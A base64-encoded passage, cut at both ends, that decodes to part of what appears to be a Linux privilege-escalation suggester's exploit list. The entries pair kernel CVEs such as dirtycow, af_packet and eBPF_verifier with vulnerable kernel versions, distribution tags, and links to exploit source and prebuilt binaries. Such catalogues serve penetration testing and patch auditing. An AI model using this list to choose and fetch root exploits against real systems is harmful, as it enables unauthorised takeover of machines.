wCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gc2VtdGV4ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzIsdmVyPDMuOC45ClRhZ3M6IFJIRUw9NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3RpbWV0b2JsZWVkLmNvbS9hLWNsb3Nlci1sb29rLWF0LWEtcmVjZW50LXByaXZpbGVnZS1lc2NhbGF0aW9uLWJ1Zy1pbi1saW51eC1jdmUtMjAxMy0yMDk0LwpleHBsb2l0LWRiOiAyNTQ0NApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTAwMzhdJHt0eHRyc3R9IHRpbWVvdXRwd24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuNC4wLHZlcjw9My4xMy4xLENPTkZJR19YODZfWDMyPXkKVGFnczogdWJ1bnR1PTEzLjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vYmxvZy5pbmNsdWRlc2VjdXJpdHkuY29tLzIwMTQvMDMvZXhwbG9pdC1DVkUtMjAxNC0wMDM4LXgzMi1yZWN2bW1zZy1rZXJuZWwtdnVsbmVyYWJsaXR5Lmh0bWwKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvdGltZW91dHB3bjY0CmV4cGxvaXQtZGI6IDMxMzQ2CkNvbW1lbnRzOiBDT05GSUdfWDg2X1gzMiBuZWVkcyB0byBiZSBlbmFibGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDAzOF0ke3R4dHJzdH0gdGltZW91dHB3biAyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjQuMCx2ZXI8PTMuMTMuMSxDT05GSUdfWDg2X1gzMj15ClRhZ3M6IHVidW50dT0oMTMuMDR8MTMuMTApe2tlcm5lbDozLig4fDExKS4wLSgxMnwxNXwxOSktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9ibG9nLmluY2x1ZGVzZWN1cml0eS5jb20vMjAxNC8wMy9leHBsb2l0LUNWRS0yMDE0LTAwMzgteDMyLXJlY3ZtbXNnLWtlcm5lbC12dWxuZXJhYmxpdHkuaHRtbApleHBsb2l0LWRiOiAzMTM0NwpDb21tZW50czogQ09ORklHX1g4Nl9YMzIgbmVlZHMgdG8gYmUgZW5hYmxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTAxOTZdJHt0eHRyc3R9IHJhd21vZGVQVFkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMSx2ZXI8PTMuMTQuMwpUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2Jsb2cuaW5jbHVkZXNlY3VyaXR5LmNvbS8yMDE0LzA2L2V4cGxvaXQtd2Fsa3Rocm91Z2gtY3ZlLTIwMTQtMDE5Ni1wdHkta2VybmVsLXJhY2UtY29uZGl0aW9uLmh0bWwKZXhwbG9pdC1kYjogMzM1MTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC0yODUxXSR7dHh0cnN0fSB1c2UtYWZ0ZXItZnJlZSBpbiBwaW5nX2luaXRfc29jaygpICR7YmxkYmx1fShEb1MpJHt0eHRyc3R9ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8PTMuMTQKVGFnczogClJhbms6IDAKYW5hbHlzaXMtdXJsOiBodHRwczovL2N5c2VjbGFicy5jb20vcGFnZT9uPTAyMDEyMDE2CmV4cGxvaXQtZGI6IDMyOTI2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtNDAxNF0ke3R4dHJzdH0gaW5vZGVfY2FwYWJsZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjEzClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDYvMTAvNApleHBsb2l0LWRiOiAzMzgyNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTQ2OTldJHt0eHRyc3R9IHB0cmFjZS9zeXNyZXQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4xLHZlcjw9My44ClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDcvMDgvMTYKZXhwbG9pdC1kYjogMzQxMzQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC00OTQzXSR7dHh0cnN0fSBQUFBvTDJUUCAke2JsZGJsdX0oRG9TKSR7dHh0cnN0fQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9My4xNS42ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL3BhZ2U/bj0wMTEwMjAxNQpleHBsb2l0LWRiOiAzNjI2NwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTUyMDddJHt0eHRyc3R9IGZ1c2Vfc3VpZApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjE2LjEKVGFnczogClJhbms6IDEKZXhwbG9pdC1kYjogMzQ5MjMKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS05MzIyXSR7dHh0cnN0fSBCYWRJUkVUClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8My4xNy41LHg4Nl82NApUYWdzOiBSSEVMPD03LGZlZG9yYT0yMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xhYnMuYnJvbWl1bS5jb20vMjAxNS8wMi8wMi9leHBsb2l0aW5nLWJhZGlyZXQtdnVsbmVyYWJpbGl0eS1jdmUtMjAxNC05MzIyLWxpbnV4LWtlcm5lbC1wcml2aWxlZ2UtZXNjYWxhdGlvbi8Kc3JjLXVybDogaHR0cDovL3NpdGUucGkzLmNvbS5wbC9leHAvcF9jdmUtMjAxNC05MzIyLnRhci5negpleHBsb2l0LWRiOgphdXRob3I6IFJhZmFsICduM3JnYWwnIFdvanRjenVrICYgQWRhbSAncGkzJyBaYWJyb2NraQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyOTBdJHt0eHRyc3R9IGVzcGZpeDY0X05NSQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMyx2ZXI8NC4xLjYseDg2XzY0ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDgvMDQvOApleHBsb2l0LWRiOiAzNzcyMgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W04vQV0ke3R4dHJzdH0gYmx1ZXRvb3RoClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA0NzU2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTMyOF0ke3R4dHJzdH0gb3ZlcmxheWZzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjEzLjAsdmVyPD0zLjE5LjAKVGFnczogdWJ1bnR1PSgxMi4wNHwxNC4wNCl7a2VybmVsOjMuMTMuMC0oMnwzfDR8NSkqLWdlbmVyaWN9LHVidW50dT0oMTQuMTB8MTUuMDQpe2tlcm5lbDozLigxM3wxNikuMC0qLWdlbmVyaWN9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNS9xMi83MTcKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvb2ZzXzMyCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL29mc182NApleHBsb2l0LWRiOiAzNzI5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTg2NjBdJHt0eHRyc3R9IG92ZXJsYXlmcyAob3ZsX3NldGF0dHIpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTQuMy4zClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTUvVXNlck5hbWVzcGFjZU92ZXJsYXlmc1NldHVpZFdyaXRlRXhlYy8KZXhwbG9pdC1kYjogMzkyMzAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjYwXSR7dHh0cnN0fSBvdmVybGF5ZnMgKG92bF9zZXRhdHRyKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjMuMwpUYWdzOiB1YnVudHU9KDE0LjA0fDE1LjEwKXtrZXJuZWw6NC4yLjAtKDE4fDE5fDIwfDIxfDIyKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE1L1VzZXJOYW1lc3BhY2VPdmVybGF5ZnNTZXR1aWRXcml0ZUV4ZWMvCmV4cGxvaXQtZGI6IDM5MTY2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMDcyOF0ke3R4dHJzdH0ga2V5cmluZwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMCx2ZXI8NC40LjEKVGFnczoKUmFuazogMAphbmFseXNpcy11cmw6IGh0dHA6Ly9wZXJjZXB0aW9uLXBvaW50LmlvLzIwMTYvMDEvMTQvYW5hbHlzaXMtYW5kLWV4cGxvaXRhdGlvbi1vZi1hLWxpbnV4LWtlcm5lbC12dWxuZXJhYmlsaXR5LWN2ZS0yMDE2LTA3MjgvCmV4cGxvaXQtZGI6IDQwMDAzCkNvbW1lbnRzOiBFeHBsb2l0IHRha2VzIGFib3V0IH4zMCBtaW51dGVzIHRvIHJ1bi4gRXhwbG9pdCBpcyBub3QgcmVsaWFibGUsIHNlZTogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL2Jsb2cvY3ZlLTIwMTYtMDcyOC1wb2Mtbm90LXdvcmtpbmcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0yMzg0XSR7dHh0cnN0fSB1c2ItbWlkaQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjQuOApUYWdzOiB1YnVudHU9MTQuMDQsZmVkb3JhPTIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3hhaXJ5LmdpdGh1Yi5pby9ibG9nLzIwMTYvY3ZlLTIwMTYtMjM4NApzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi0yMzg0L3BvYy5jCmV4cGxvaXQtZGI6IDQxOTk5CkNvbW1lbnRzOiBSZXF1aXJlcyBhYmlsaXR5IHRvIHBsdWcgaW4gYSBtYWxpY2lvdXMgVVNCIGRldmljZSBhbmQgdG8gZXhlY3V0ZSBhIG1hbGljaW91cyBiaW5hcnkgYXMgYSBub24tcHJpdmlsZWdlZCB1c2VyCmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDk5N10ke3R4dHJzdH0gdGFyZ2V0X29mZnNldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPD00LjQuMCxjbWQ6Z3JlcCAtcWkgaXBfdGFibGVzIC9wcm9jL21vZHVsZXMKVGFnczogdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9vZmZlbnNpdmUtc2VjdXJpdHkvZXhwbG9pdC1kYXRhYmFzZS1iaW4tc3Bsb2l0cy9yYXcvbWFzdGVyL2Jpbi1zcGxvaXRzLzQwMDUzLnppcApDb21tZW50czogaXBfdGFibGVzLmtvIG5lZWRzIHRvIGJlIGxvYWRlZApleHBsb2l0LWRiOiA0MDA0OQphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDU1N10ke3R4dHJzdH0gZG91YmxlLWZkcHV0KCkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8NC41LjUsQ09ORklHX0JQRl9TWVNDQUxMPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkIT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC40LjAtMjEtZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vYnVncy5jaHJvbWl1bS5vcmcvcC9wcm9qZWN0LXplcm8vaXNzdWVzL2RldGFpbD9pZD04MDgKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0LWRhdGFiYXNlLWJpbi1zcGxvaXRzL3Jhdy9tYXN0ZXIvYmluLXNwbG9pdHMvMzk3NzIuemlwCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKZXhwbG9pdC1kYjogNDA3NTkKYXV0aG9yOiBKYW5uIEhvcm4KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01MTk1XSR7dHh0cnN0fSBkaXJ0eWNvdwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIyLHZlcjw9NC44LjMKVGFnczogZGViaWFuPTd8OCxSSEVMPTV7a2VybmVsOjIuNi4oMTh8MjR8MzMpLSp9LFJIRUw9NntrZXJuZWw6Mi42LjMyLSp8My4oMHwyfDZ8OHwxMCkuKnwyLjYuMzMuOS1ydDMxfSxSSEVMPTd7a2VybmVsOjMuMTAuMC0qfDQuMi4wLTAuMjEuZWw3fSx1YnVudHU9MTYuMDR8MTQuMDR8MTIuMDQKUmFuazogNAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9kaXJ0eWNvdy9kaXJ0eWNvdy5naXRodWIuaW8vd2lraS9WdWxuZXJhYmlsaXR5RGV0YWlscwpDb21tZW50czogRm9yIFJIRUwvQ2VudE9TIHNlZSBleGFjdCB2dWxuZXJhYmxlIHZlcnNpb25zIGhlcmU6IGh0dHBzOi8vYWNjZXNzLnJlZGhhdC5jb20vc2l0ZXMvZGVmYXVsdC9maWxlcy9yaC1jdmUtMjAxNi01MTk1XzUuc2gKZXhwbG9pdC1kYjogNDA2MTEKYXV0aG9yOiBQaGlsIE9lc3RlcgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTUxOTVdJHt0eHRyc3R9IGRpcnR5Y293IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yMix2ZXI8PTQuOC4zClRhZ3M6IGRlYmlhbj03fDgsUkhFTD01fDZ8Nyx1YnVudHU9MTQuMDR8MTIuMDQsdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItMjEtZ2VuZXJpY30sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiA0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL2RpcnR5Y293L2RpcnR5Y293LmdpdGh1Yi5pby93aWtpL1Z1bG5lcmFiaWxpdHlEZXRhaWxzCmV4dC11cmw6IGh0dHBzOi8vd3d3LmV4cGxvaXQtZGIuY29tL2Rvd25sb2FkLzQwODQ3CkNvbW1lbnRzOiBGb3IgUkhFTC9DZW50T1Mgc2VlIGV4YWN0IHZ1bG5lcmFibGUgdmVyc2lvbnMgaGVyZTogaHR0cHM6Ly9hY2Nlc3MucmVkaGF0LmNvbS9zaXRlcy9kZWZhdWx0L2ZpbGVzL3JoLWN2ZS0yMDE2LTUxOTVfNS5zaApleHBsb2l0LWRiOiA0MDgzOQphdXRob3I6IEZpcmVGYXJ0IChhdXRob3Igb2YgZXhwbG9pdCBhdCBFREIgNDA4MzkpOyBHYWJyaWVsZSBCb25hY2luaSAoYXV0aG9yIG9mIGV4cGxvaXQgYXQgJ2V4dC11cmwnKQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTg2NTVdJHt0eHRyc3R9IGNob2NvYm9fcm9vdApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPDQuOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtKDIxfDIyfDI0fDI4fDMxfDM0fDM2fDM4fDQyfDQzfDQ1fDQ3fDUxKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTYvMTIvMDYvMQpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwYWJpbGl0eSBpcyBuZWVkZWQgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkcyB0byBiZSBlbmFibGVkCmJpbi11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yYXBpZDcvbWV0YXNwbG9pdC1mcmFtZXdvcmsvbWFzdGVyL2RhdGEvZXhwbG9pdHMvQ1ZFLTIwMTYtODY1NS9jaG9jb2JvX3Jvb3QKZXhwbG9pdC1kYjogNDA4NzEKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTk3OTNdJHt0eHRyc3R9IFNPX3tTTkR8UkNWfUJVRkZPUkNFClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjExLHZlcjw0LjguMTQsQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS94YWlyeS9rZXJuZWwtZXhwbG9pdHMvdHJlZS9tYXN0ZXIvQ1ZFLTIwMTYtOTc5MwpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi05NzkzL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcHMgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkZWQuIE5vIFNNRVAvU01BUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIFRlc3RlZCBpbiBRRU1VIG9ubHkKZXhwbG9pdC1kYjogNDE5OTUKYXV0aG9yOiBBbmRyZXkgJ3hhaXJ5JyBLb25vdmFsb3YKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy02MDc0XSR7dHh0cnN0fSBkY2NwClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD00LjkuMTEsQ09ORklHX0lQX0RDQ1A9W215XQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtNjItZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAyLzIyLzMKQ29tbWVudHM6IFJlcXVpcmVzIEtlcm5lbCBiZSBidWlsdCB3aXRoIENPTkZJR19JUF9EQ0NQIGVuYWJsZWQuIEluY2x1ZGVzIHBhcnRpYWwgU01FUC9TTUFQIGJ5cGFzcwpleHBsb2l0LWRiOiA0MTQ1OAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTczMDhdJHt0eHRyc3R9IGFmX3BhY2tldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMC42LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC44LjAtKDM0fDM2fDM5fDQxfDQyfDQ0fDQ1KS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGVwcm9qZWN0emVyby5ibG9nc3BvdC5jb20vMjAxNy8wNS9leHBsb2l0aW5nLWxpbnV4LWtlcm5lbC12aWEtcGFja2V0Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3hhaXJ5L2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwIG9yIENPTkZJR19VU0VSX05TPXkgbmVlZGVkLiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyBhZGRzIHN1cHBvcnQgZm9yIGFkZGl0aW9uYWwga2VybmVscwpiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE3LTczMDgvZXhwbG9pdApleHBsb2l0LWRiOiA0MTk5NAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTY5OTVdJHt0eHRyc3R9IGVCUEZfdmVyaWZpZXIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuOCxDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogZGViaWFuPTkuMHtrZXJuZWw6NC45LjAtMy1hbWQ2NH0sZmVkb3JhPTI1fDI2fDI3LHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtODktZ2VuZXJpY30sdWJ1bnR1PSgxNi4wNHwxNy4wNCl7a2VybmVsOjQuKDh8MTApLjAtKDE5fDI4fDQ1KS1nZW5lcmljfQpSYW5rOiA1CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9yaWNrbGFyYWJlZS5ibG9nc3BvdC5jb20vMjAxOC8wNy9lYnBmLWFuZC1hbmFseXNpcy1vZi1nZXQtcmVrdC1saW51eC5odG1sCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xNjk5NS9leHBsb2l0Lm91dApleHBsb2l0LWRiOiA0NTAxMAphdXRob3I6IFJpY2sgTGFyYWJlZQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTEwMDAxMTJdJHt0eHRyc3R9IE5FVElGX0ZfVUZPClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjQsdmVyPD00LjEzLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtKn0sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTcvMDgvMTMvMQpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcCBvciBDT05GSUdfVVNFUl9OUz15IG5lZWRlZC4gU01FUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIE1vZGlmaWVkIHZlcnNpb24gYXQgJ2V4dC11cmwnIGFkZHMgc3VwcG9ydCBmb3IgYWRkaXRpb25hbCBkaXN0cm9zL2tlcm5lbHMKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xMDAwMTEyL2V4cGxvaXQub3V0CmV4cGxvaXQtZGI6CmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92IChvcmdpbmFsIGV4cGxvaXQgYXV0aG9yKTsgQnJlbmRhbiBDb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMjUzXS